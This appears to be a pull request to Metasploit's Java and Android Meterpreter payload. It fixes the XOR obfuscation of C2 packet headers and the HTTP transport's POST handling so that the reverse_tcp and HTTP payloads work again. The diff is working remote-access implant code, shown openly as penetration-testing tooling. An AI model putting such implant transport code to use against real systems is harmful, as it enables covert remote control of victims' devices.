### PR TITLE
Java (and Android) XOR obfuscation fixes.

### DIFF
--- a/java/meterpreter/meterpreter/src/main/java/com/metasploit/meterpreter/HttpTransport.java
+++ b/java/meterpreter/meterpreter/src/main/java/com/metasploit/meterpreter/HttpTransport.java
@@ -1,16 +1,15 @@
 package com.metasploit.meterpreter;
 
+import com.metasploit.meterpreter.command.Command;
+
 import java.io.DataInputStream;
 import java.io.DataOutputStream;
-import java.io.OutputStream;
 import java.io.EOFException;
 import java.io.IOException;
-
+import java.io.OutputStream;
 import java.net.MalformedURLException;
 import java.net.URL;
 import java.net.URLConnection;
-
-import com.metasploit.meterpreter.command.Command;
 
 public class HttpTransport extends Transport {
     private static final int UA_LEN = 256;
@@ -185,6 +184,7 @@ public class HttpTransport extends Transport {
             return;
         }
 
+        conn.setDoOutput(true);
         DataOutputStream outputStream = new DataOutputStream(conn.getOutputStream());
         this.encodePacketAndWrite(packet, type, outputStream);
         outputStream.close();
@@ -267,7 +267,6 @@ public class HttpTransport extends Transport {
                     // perhaps log?
                 }
             }
-            conn.setDoOutput(true);
         }
         catch (IOException ex) {
             if (conn != null) {

--- a/java/meterpreter/meterpreter/src/main/java/com/metasploit/meterpreter/Transport.java
+++ b/java/meterpreter/meterpreter/src/main/java/com/metasploit/meterpreter/Transport.java
@@ -49,9 +49,7 @@ public abstract class Transport {
 
     protected TLVPacket readAndDecodePacket(DataInputStream in) throws IOException {
         int xorKey = in.readInt();
-        System.out.format("XOR key is 0x%x\n", xorKey);
-        int len = in.readInt() ^ xorKey - 8;
-        System.out.format("Length is %u\n", len);
+        int len = (in.readInt() ^ Integer.reverseBytes(xorKey)) - 8;
         int type = in.readInt();
         byte[] body = new byte[len];
         in.readFully(body);
@@ -72,8 +70,8 @@ public abstract class Transport {
         this.xorBytes(xorKey, data);
         synchronized (out) {
             out.writeInt(xorKey);
-            out.writeInt((data.length + 8) ^ xorKey);
-            out.writeInt(type ^ xorKey);
+            out.writeInt((data.length + 8) ^ Integer.reverseBytes(xorKey));
+            out.writeInt(type ^ Integer.reverseBytes(xorKey));
             out.write(data);
             out.flush();
         }


### PR DESCRIPTION
This appears to fix the Java (and therefore Android) payloads to work with the new XOR encoding :) 
The first commit fixes reverse_tcp, I'm a bit confused by this as I thought _everything_ was big endian. However it wasn't working before and it seems to work well now.
The second commit is more straightforward and fixes the GET instead of a POST with RECV body change. This change ensures setDoOutput(true) is only called when post data is sent.
